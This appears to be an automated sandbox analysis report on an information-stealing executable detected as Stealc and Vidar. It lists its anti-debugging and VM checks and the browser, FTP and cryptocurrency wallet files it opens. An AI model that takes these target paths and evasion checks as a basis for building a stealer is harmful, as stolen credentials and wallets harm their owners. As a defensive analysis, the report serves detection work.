Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 9.9 %

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008A4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0089DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0089E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_008A3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0089F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_008916D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0089BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_008A38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0089ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_008A4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0089DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00891160 GetSystemInfo,ExitProcess,

0_2_00891160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JKJEHJKJ.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9
Source: JKJEHJKJ.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: JKJEHJKJ.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2274503696.0000000001594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: JKJEHJKJ.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: JKJEHJKJ.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: JKJEHJKJ.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: JKJEHJKJ.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: JKJEHJKJ.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: JKJEHJKJ.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: JKJEHJKJ.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: JKJEHJKJ.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: JKJEHJKJ.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: JKJEHJKJ.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: JKJEHJKJ.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: JKJEHJKJ.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JKJEHJKJ.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: JKJEHJKJ.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: JKJEHJKJ.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: JKJEHJKJ.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58150
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58153
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59340
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58165
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58169
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58205

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008945C0 VirtualProtect ?,00000004,00000100,00000000

0_2_008945C0

Source: C:\Users\user\Desktop\file.exe

0_2_008A9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A9750 mov eax, dword ptr fs:[00000030h]

0_2_008A9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_008A78E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C68B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6104, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_008A9600

Source: file.exe, file.exe, 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: GProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_008A7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_008A7980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_008A7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_008A7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2274503696.000000000154E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2047168594.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6104, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6104, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.2274503696.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp*
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: n\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Led
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.2290554138.0000000029B8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.@

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

